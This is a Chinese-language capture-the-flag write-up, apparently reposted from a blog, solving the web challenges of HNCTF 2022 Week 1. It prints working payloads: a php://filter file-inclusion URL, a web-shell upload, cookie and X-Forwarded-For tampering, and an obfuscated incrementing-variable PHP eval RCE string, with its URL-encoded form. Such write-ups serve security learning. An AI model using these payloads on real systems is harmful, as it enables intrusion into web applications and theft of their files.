码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • [HNCTF 2022 Week1]——Web方向 详细Writeup


    Week1

    [HNCTF 2022 Week1]2048

    f12查看源代码

    image-20230706180920528

    可以看出游戏的分数是score

    image-20230706181314548

    修改score的值

    image-20230706181335493

    得到flag

    [HNCTF 2022 Week1]Interesting_include

    得到源码

    
    //WEB手要懂得搜索
    //flag in ./flag.php
    
    if(isset($_GET['filter'])){
        $file = $_GET['filter'];
        if(!preg_match("/flag/i", $file)){
            die("error");
        }
        include($file);
    }else{
        highlight_file(__FILE__);
    } 
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13

    php伪协议,构造payload:

    http://node3.anna.nssctf.cn:28894/?filter=php://filter/read=convert.base64-encode/resource=flag.php
    
    • 1

    base64解码得到flag

    [HNCTF 2022 Week1]easy_upload

    不是,你个标签整这么吓人干嘛啊???是谁!!

    image-20230707171703762

    一句话木马直接挂马成功了

    image-20230707175040356

    蚁剑直接连接

    image-20230707175126198

    根目录下得到flag

    [HNCTF 2022 Week1]easy_html

    说饼干中好像有什么东西,那就看cookie,url转码一下,./f14g.php,然后去访问

    image-20230707175428595

    说要输入手机号登录,本来想随便输入一个的,但是只能输入十位,并且会回显nononono!

    image-20230707183952827

    利用burp抓包,强行输入11位数字,发包得到flag

    image-20230707184059624

    [HNCTF 2022 Week1]What is Web

    CTRL+U往下拉

    image-20230707190548543

    base64解码得到flag

    [HNCTF 2022 Week1]Interesting_http

    说要post a want,那就给他发一个want

    image-20230707191323402

    给了两个单词,肯定选flag,然后发包

    image-20230707191434589

    提示Not admin,用burp抓包,可以看到cookie中有一个user,值是notadmin改成admin

    image-20230707191950964

    提示No location,用XFF打

    image-20230707192212380

    拿到flag

    [HNCTF 2022 Week1]Challenge__rce

    f12查看hint,?hint

    image-20230707195557715

    给hint传入一个值得到源码

    
    error_reporting(0);
    if (isset($_GET['hint'])) {
        highlight_file(__FILE__);
    }
    if (isset($_POST['rce'])) {
        $rce = $_POST['rce'];
        if (strlen($rce) <= 120) {
            if (is_string($rce)) {
                if (!preg_match("/[!@#%^&*:'\-\"\/|`a-zA-Z~\\\\]/", $rce)) {
                    eval($rce);
                } else {
                    echo("Are you hack me?");
                }
            } else {
                echo "I want string!";
            }
        } else {
            echo "too long!";
        }
    } 
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21

    说明这里要进行RCE,但是过滤掉了大部分东西,这里可以用的是$()+,.0123456789;=[]_{},那么就是自增RCE

    关于自增RCE可看这篇:CTFshow-RCE极限大挑战wp

    直接放payload:

    rce=$_=[]._;$__=$_[1];$_=$_[0];$_++;$_1=++$_;$_++;$_++;$_++;$_++;$_=$_1.++$_.$__;$_=_.$_(71).$_(69).$_(84);$$_[1]($$_[2]);
    
    • 1

    但是传入的时候要进行url编码

    %24_%3D%5B%5D._%3B%24__%3D%24_%5B1%5D%3B%24_%3D%24_%5B0%5D%3B%24_%2B%2B%3B%24_1%3D%2B%2B%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D%24_1.%2B%2B%24_.%24__%3B%24_%3D_.%24_(71).%24_(69).%24_(84)%3B%24%24_%5B1%5D(%24%24_%5B2%5D)%3B
    
    • 1

    并且传入的时候要传入1和2,如下

    image-20230707200731013

    然后将2的值为cat /ffflllaaaggg

    得到flag

  • 相关阅读:
    饿了么三面:让你怀疑人生的Spring Boot夺命连环40问
    Scheduling_Channel_Access_Based_on_Target_Wake_Time_Mechanism_in_802.11ax_WLANs
    【JavaScript】Promise(三) —— async 与 await、宏任务与微任务
    HTML5七夕情人节表白网页制作【满天星空3D相册】HTML+CSS+JavaScript 3D动态相册网页代码
    2022年(第二届)信息技术服务业应用技能大赛网络与信息安全管理赛项的通知
    预训练模型(Bert及GPT-2)相关资料整理
    电商商品详情如何快速高效获取,api来帮你!
    GZ033 大数据应用开发赛题第10套
    7种设计模式
    Java框架(八)--SpringMVC拦截器(1)--拦截器开发流程、多Interceptor执行顺序及preHandle返回值
  • 原文地址:https://blog.csdn.net/Leaf_initial/article/details/132737174
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号